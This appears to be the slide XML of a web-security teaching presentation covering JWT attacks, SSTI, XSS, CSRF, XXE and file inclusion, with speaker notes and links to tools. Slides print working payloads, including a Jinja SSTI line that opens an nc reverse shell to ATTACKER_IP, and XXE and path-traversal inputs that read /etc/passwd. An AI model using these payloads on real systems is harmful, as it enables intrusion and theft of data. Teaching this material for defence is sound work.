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Spectral"/>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hE/tbMGfaxtZPRNRWh3U0PBOgX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Spectral-italic.fntdata"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide5.xml"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/Spectral-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Spectral-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rtswigger.net/web-security/cross-site-scripting/cheat-shee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127.0.0.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552b0b153c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3552b0b153c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Key Brute force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Perform a dictionary attack on the signature, Can be done with JWT_Tool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None Alg Attack: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Decode the token, change the algorithm to None (or none, NONE, nOnE) in the header, remove the signature, and send the modified token. Some applications are vulnerable to this attack since some support a None algorithm for signature.</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SzPts val="1100"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Alg Confusion Attack</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GB"/>
              <a:t>	Obtain the server's public key</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GB"/>
              <a:t>	Convert the public key to a suitable format</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GB"/>
              <a:t>	Create a malicious JWT with a modified payload and the alg header set to HS256.</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GB"/>
              <a:t>	Sign the token with HS256, using the public key as the secret.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Incorrect Signature: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When the backend doesn’t sign / verify signatures properly you can potentially just chane information in the token</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="250" name="Google Shape;250;g3552b0b153c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52b0b153c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3552b0b153c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g3552b0b153c_0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52b0b153c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3552b0b153c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3552b0b153c_0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52b0b153c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3552b0b153c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Bit of code from my FYP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Essentially it loops through a variable passed to the DOM {%%} in JINJA is basically python code</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>You can output variables to the dom by enclosing them within {{ }}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If the value of the variable though is a template format specifier and it hasn’t been handled / rendered properly, it can lead to Code execution or other fun things.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="281" name="Google Shape;281;g3552b0b153c_0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552b0b153c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3552b0b153c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Some payload examples</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="292" name="Google Shape;292;g3552b0b153c_0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552b0b153c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3552b0b153c_0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Some payload examples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&lt;script&gt;alert(1)&lt;/script&gt;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&lt;img src/onerror=”alert(1)”&gt;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u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://portswigger.net/web-security/cross-site-scripting/cheat-sheet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="302" name="Google Shape;302;g3552b0b153c_0_1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552b0b153c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3552b0b153c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3552b0b153c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552b0b153c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3552b0b153c_0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XML external entity injection (also known as XXE) is a web security vulnerability that allows an attacker to interfere with an application's processing of XML data. It often allows an attacker to view files on the application server filesystem, and to interact with any back-end or external systems that the application itself can access.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This web app looks like it is a stock check for a certain product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The XXE attempt is just seeing if we can add our own xml entity in.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22" name="Google Shape;322;g3552b0b153c_0_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5580689e9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35580689e9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Here we have the same thing except we are trying to load /etc/passwd into example and then load &amp;example into the XML. This is an example of using XXE for File disclosure</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="332" name="Google Shape;332;g35580689e9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552b0b153c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3552b0b153c_0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Can replace cat.jpg with payload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Much more common than RFI.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LFI != path traversal</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="342" name="Google Shape;342;g3552b0b153c_0_2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8c0d0a792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08c0d0a792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308c0d0a792_0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555b638ea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3555b638ead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This is a fairly rare </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>exploit as most developers don’t pass something the user can control into include()</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="352" name="Google Shape;352;g3555b638ead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552b0b153c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3552b0b153c_0_2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3552b0b153c_0_2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555b638ea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3555b638ead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g3555b638ead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5580689e99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35580689e99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g35580689e99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8c0d0a792_0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308c0d0a792_0_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308c0d0a792_0_3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52a53ec5cb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352a53ec5cb_0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352a53ec5cb_0_1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52a53ec5cb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352a53ec5cb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352a53ec5cb_0_1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52b0b153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3552b0b153c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3552b0b153c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552b0b153c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3552b0b153c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Show off burp features</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="199" name="Google Shape;199;g3552b0b153c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552b0b153c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3552b0b153c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Show off burp features</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="210" name="Google Shape;210;g3552b0b153c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552b0b153c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3552b0b153c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Show off burp features</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="220" name="Google Shape;220;g3552b0b153c_0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52b0b153c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3552b0b153c_0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Essentially how this worked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In the JWT you could specify the location of the public key file, in this case jwks.json (we’ll touch on this more in a bit)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In the web app there was an SSRF vulnerability in the analytics API that allowed for redirects to occur. The location in the JWT had to start with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://127.0.0.1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t> which is why this SSRF was necessary. It redirected to my webserver and pulled my set of keys, which meant I could now sign my own JWTs using my own private key.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="230" name="Google Shape;230;g3552b0b153c_0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52b0b153c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3552b0b153c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Key Brute force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Perform a dictionary attack on the signature, Can be done with JWT_Tool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None Alg Attack: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D</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>ecode the token, change the algorithm to None (or none, NONE, nOnE) in the header, remove the signature, and send the modified token. Some applications are vulnerable to this attack since some support a None algorithm for signature.</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100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Alg Confusion Attack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Obtain the server's public key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Convert the public key to a suitable format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Create a malicious JWT with a modified payload and the alg header set to HS256.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en-GB"/>
              <a:t>	Sign the token with HS256, using the public key as the secret.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Incorrect Signature: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When the backend doesn’t sign / verify signatures properly you can potentially just chane information in the token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JKU spoofing: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If the token uses a jku header you may be able to spoof it to point to a webserver you control and therefore use your public/private keys ( same as I spoke about earlier with the SSRF )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This can be a bit fiddly depending on the security controls put in place but overall a decent attack if you can get it working.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="240" name="Google Shape;240;g3552b0b153c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2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26"/>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2" name="Google Shape;112;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2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2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2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2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3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1"/>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31"/>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3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3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2"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph idx="2" type="pic"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5183188" y="987425"/>
            <a:ext cx="6172200" cy="4873500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="143" name="Google Shape;143;p32"/>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3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3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3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3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3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3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74000">
              <a:srgbClr val="3A3A3A"/>
            </a:gs>
            <a:gs pos="83000">
              <a:srgbClr val="3A3A3A"/>
            </a:gs>
            <a:gs pos="100000">
              <a:srgbClr val="3A3A3A"/>
            </a:gs>
          </a:gsLst>
          <a:lin ang="5400012" scaled="0"/>
        </a:gradFill>
      </p:bgPr>
    </p:bg>
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="84" name="Shape 84"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="85" name="Google Shape;85;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2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hyperlink" Target="https://portswigger.net/web-security" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/swisskyrepo/PayloadsAllTheThing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hyperlink" Target="https://www.thehacker.recipes/" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/ticarpi/jwt_tool" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://owasp.org/www-project-top-ten/" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/Paradoxis/Flask-Unsign" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/swisskyrepo/PayloadsAllTheThings" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://book.hacktricks.wiki/en/index.html" TargetMode="External"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://sqlmap.org/" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/r0oth3x49/ghauri" TargetMode="External"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://portswigger.net/web-secur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552b0b153c_0_9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53" name="Google Shape;253;g3552b0b153c_0_9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54" name="Google Shape;254;g3552b0b153c_0_9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5" name="Google Shape;255;g3552b0b153c_0_93"/>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374650" lvl="0" marL="914400" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="107000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="2300"/>
              <a:buFont typeface="Comic Sans MS"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="1" sz="2300">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Comic Sans MS"/>
              <a:ea typeface="Comic Sans MS"/>
              <a:cs typeface="Comic Sans MS"/>
              <a:sym typeface="Comic Sans MS"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="256" name="Google Shape;256;g3552b0b153c_0_93"/>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JWT</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="2800" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="lt2"/>
              </a:solidFill>
              <a:latin typeface="Comic Sans MS"/>
              <a:ea typeface="Comic Sans MS"/>
              <a:cs typeface="Comic Sans MS"/>
              <a:sym typeface="Comic Sans MS"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="257" name="Google Shape;257;g3552b0b153c_0_93"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="2076967"/>
            <a:ext cx="12192000" cy="38413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3552b0b153c_0_11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64" name="Google Shape;264;g3552b0b153c_0_11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65" name="Google Shape;265;g3552b0b153c_0_1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6" name="Google Shape;266;g3552b0b153c_0_110"/>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374650" lvl="0" marL="9144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To attack JWTs, you can use the JWT extension in Burp and also </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="2300">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Comic Sans MS"/>
                <a:ea typeface="Comic Sans MS"/>
                <a:cs typeface="Comic Sans MS"/>
                <a:sym typeface="Comic Sans MS"/>
              </a:rPr>
              <a:t>JWT_Tool</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="2300">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Comic Sans MS"/>
                <a:ea typeface="Comic Sans MS"/>
                <a:cs typeface="Comic Sans MS"/>
                <a:sym typeface="Comic Sans MS"/>
              </a:rPr>
              <a:t> (google it you’ll find the GitHub)</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2300">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Comic Sans MS"/>
              <a:ea typeface="Comic Sans MS"/>
              <a:cs typeface="Comic Sans MS"/>
              <a:sym typeface="Comic Sans MS"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-374650" lvl="0" marL="914400" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="107000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="2300"/>
              <a:buFont typeface="Comic Sans MS"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="1" sz="2300">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Comic Sans MS"/>
              <a:ea typeface="Comic Sans MS"/>
              <a:cs typeface="Comic Sans MS"/>
              <a:sym typeface="Comic Sans MS"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-374650" lvl="0" marL="9144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If you’re attacking a Flask application, you may find that you have a session token that looks very similar to a JWT. This is a flask session token and they work basically the same as JWTs but to decode / attack them you use a different tool, </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="2300">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Comic Sans MS"/>
                <a:ea typeface="Comic Sans MS"/>
                <a:cs typeface="Comic Sans MS"/>
                <a:sym typeface="Comic Sans MS"/>
              </a:rPr>
              <a:t>flask-unsign.</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2300">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:latin typeface="Comic Sans MS"/>
              <a:ea typeface="Comic Sans MS"/>
              <a:cs typeface="Comic Sans MS"/>
              <a:sym typeface="Comic Sans MS"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="267" name="Google Shape;267;g3552b0b153c_0_110"/>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JWT</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552b0b153c_0_13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74" name="Google Shape;274;g3552b0b153c_0_13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75" name="Google Shape;275;g3552b0b153c_0_1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6" name="Google Shape;276;g3552b0b153c_0_130"/>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374650" lvl="0" marL="9144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Server Side Template Injection</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Some Modern webapps use Templating Engines such as Twig (PHP) or JINJA (Python/Flask).</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These templating engines are a good way of updating the HTML of a webpage with the results of requests. Say you pull a list of names out of a file and want to update the DOM with them, you can add it into the template.</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p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="277" name="Google Shape;277;g3552b0b153c_0_130"/>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SSTI</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552b0b153c_0_13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84" name="Google Shape;284;g3552b0b153c_0_13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85" name="Google Shape;285;g3552b0b153c_0_13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6" name="Google Shape;286;g3552b0b153c_0_139"/>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p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="287" name="Google Shape;287;g3552b0b153c_0_139"/>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Example Template</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="2800" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="lt2"/>
              </a:solidFill>
              <a:latin typeface="Comic Sans MS"/>
              <a:ea typeface="Comic Sans MS"/>
              <a:cs typeface="Comic Sans MS"/>
              <a:sym typeface="Comic Sans MS"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="288" name="Google Shape;288;g3552b0b153c_0_139"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="278800" y="1913937"/>
            <a:ext cx="11323125" cy="425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3552b0b153c_0_15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95" name="Google Shape;295;g3552b0b153c_0_15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96" name="Google Shape;296;g3552b0b153c_0_15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7" name="Google Shape;297;g3552b0b153c_0_155"/>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 7 * 7 }} - Easiest payload </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="2300">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Comic Sans MS"/>
                <a:ea typeface="Comic Sans MS"/>
                <a:cs typeface="Comic Sans MS"/>
                <a:sym typeface="Comic Sans MS"/>
              </a:rPr>
              <a:t>you</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="2300">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Comic Sans MS"/>
                <a:ea typeface="Comic Sans MS"/>
                <a:cs typeface="Comic Sans MS"/>
                <a:sym typeface="Comic Sans MS"/>
              </a:rPr>
              <a:t> can try, if it prints 49 to the screen, it’s vulnerable</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${{&lt;%[%'"}}%\. - SSTI polyglot, if it exists this will probably trigger it</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{{''.__class__.__mro__[1].__subclasses__()[407] ('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2&gt;&amp;1|nc ATTACKER_IP LISENTING_PORT &gt;/tmp/f',shell=True,stdout=-1).communicate()}} - Example of potential RCE </a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2300">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Comic Sans MS"/>
              <a:ea typeface="Comic Sans MS"/>
              <a:cs typeface="Comic Sans MS"/>
              <a:sym typeface="Comic Sans MS"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="298" name="Google Shape;298;g3552b0b153c_0_155"/>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SSTI payloads</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552b0b153c_0_17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05" name="Google Shape;305;g3552b0b153c_0_17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06" name="Google Shape;306;g3552b0b153c_0_17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7" name="Google Shape;307;g3552b0b153c_0_177"/>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Cross Site Scripting</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Running </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="2300">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Comic Sans MS"/>
                <a:ea typeface="Comic Sans MS"/>
                <a:cs typeface="Comic Sans MS"/>
                <a:sym typeface="Comic Sans MS"/>
              </a:rPr>
              <a:t>arbitrary</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="2300">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Comic Sans MS"/>
                <a:ea typeface="Comic Sans MS"/>
                <a:cs typeface="Comic Sans MS"/>
                <a:sym typeface="Comic Sans MS"/>
              </a:rPr>
              <a:t> JavaScript on a target web app to perform some malicious action.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Once you have XSS you can do pretty much anything with the webapp. Update the DOM, steal session cookies, etc.</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Easiest way is using script tags</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&lt;script&gt;alert(1)&lt;/script&gt;</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You can use other tags to achieve the same thing, potentially bypassing any filters on certain tags.</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p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="308" name="Google Shape;308;g3552b0b153c_0_177"/>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XSS</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552b0b153c_0_16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15" name="Google Shape;315;g3552b0b153c_0_16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16" name="Google Shape;316;g3552b0b153c_0_16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7" name="Google Shape;317;g3552b0b153c_0_168"/>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Cross Site Request Forgery</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CSRF is the act of forcing a users browser to make HTTP requests the user isn’t aware of. CSRF is usually a further attack on top of an existing XSS or other attack. A good example would be something like:</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http[://]bank.com[/]sendmoney?accno=1000&amp;amount=100</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This could be injected into another, attacker controlled origin. When the user goes to the attacker controlled site, if the bank has not included anti csrf measures, money could be transferred to the attackers account without your knowledge.</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h</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="2300">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Comic Sans MS"/>
                <a:ea typeface="Comic Sans MS"/>
                <a:cs typeface="Comic Sans MS"/>
                <a:sym typeface="Comic Sans MS"/>
              </a:rPr>
              <a:t>ttp[://]attacker.com[/]mycoolblog</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p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="318" name="Google Shape;318;g3552b0b153c_0_168"/>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CSRF</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552b0b153c_0_18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25" name="Google Shape;325;g3552b0b153c_0_18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26" name="Google Shape;326;g3552b0b153c_0_18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7" name="Google Shape;327;g3552b0b153c_0_186"/>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XML External Entity injection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XXE comes from how some web applications that use the XML standard for data exchange. </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="2300">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Comic Sans MS"/>
                <a:ea typeface="Comic Sans MS"/>
                <a:cs typeface="Comic Sans MS"/>
                <a:sym typeface="Comic Sans MS"/>
              </a:rPr>
              <a:t>Unfortunately, the XML standard has some potentially malicious features. This can lead to SSRF, LFI, RCE etc.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&lt;?xml version="1.0" encoding="UTF-8"?&gt;</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&lt;!DOCTYPE foo [&lt;!ENTITY toreplace "3"&gt; ]&gt;</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&lt;stockCheck&gt;</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    &lt;productId&gt;&amp;toreplace;&lt;/productId&gt;</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    &lt;storeId&gt;1&lt;/storeId&gt;</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Clr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="2300">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Comic Sans MS"/>
                <a:ea typeface="Comic Sans MS"/>
                <a:cs typeface="Comic Sans MS"/>
                <a:sym typeface="Comic Sans MS"/>
              </a:rPr>
              <a:t>&lt;/stockCheck&gt;</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p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="328" name="Google Shape;328;g3552b0b153c_0_186"/>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XXE</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5580689e99_0_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35" name="Google Shape;335;g35580689e99_0_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36" name="Google Shape;336;g35580689e99_0_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7" name="Google Shape;337;g35580689e99_0_1"/>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XML External Entity injection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&lt;!--?xml version="1.0" ?--&gt;</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&lt;!DOCTYPE foo [&lt;!ENTITY example SYSTEM "/etc/passwd"&gt; ]&gt;</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&lt;data&gt;&amp;example;&lt;/data&gt;</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p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="338" name="Google Shape;338;g35580689e99_0_1"/>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XXE</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552b0b153c_0_20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45" name="Google Shape;345;g3552b0b153c_0_20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46" name="Google Shape;346;g3552b0b153c_0_20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7" name="Google Shape;347;g3552b0b153c_0_202"/>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Local|Remote File Inclusion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Local file </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="2300">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Comic Sans MS"/>
                <a:ea typeface="Comic Sans MS"/>
                <a:cs typeface="Comic Sans MS"/>
                <a:sym typeface="Comic Sans MS"/>
              </a:rPr>
              <a:t>inclusion is a mainly PHP problem (no surprises there)</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This is where the backend loads a file based on user input. It can be used to leak sensitive information via path traversal (a more universal vulnerability) or in the case of PHP, potentially escalate to Remote Code Execution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http[://]victim[.]com[/]gallery?photo=cat.jpg</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http[://]victim[.]com[/]gallery?photo=../../../../../../../../../etc/passwd</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p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="348" name="Google Shape;348;g3552b0b153c_0_202"/>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LFI/RFI</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08c0d0a792_0_30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pic>
        <p:nvPicPr>
          <p:cNvPr id="169" name="Google Shape;169;g308c0d0a792_0_30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0" name="Google Shape;170;g308c0d0a792_0_30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sp>
        <p:nvSpPr>
          <p:cNvPr id="171" name="Google Shape;171;g308c0d0a792_0_301"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3754650" y="1068625"/>
            <a:ext cx="4682700" cy="6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lt1"/>
                </a:solidFill>
                <a:latin typeface="Comic Sans MS"/>
                <a:ea typeface="Comic Sans MS"/>
                <a:cs typeface="Comic Sans MS"/>
                <a:sym typeface="Comic Sans MS"/>
              </a:rPr>
              <a:t>Don’t Do illegal Shit!</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en-GB" sz="2800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Comic Sans MS"/>
                <a:ea typeface="Comic Sans MS"/>
                <a:cs typeface="Comic Sans MS"/>
                <a:sym typeface="Comic Sans MS"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="2800" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Comic Sans MS"/>
              <a:ea typeface="Comic Sans MS"/>
              <a:cs typeface="Comic Sans MS"/>
              <a:sym typeface="Comic Sans MS"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="172" name="Google Shape;172;g308c0d0a792_0_301"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="12814" r="24057" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
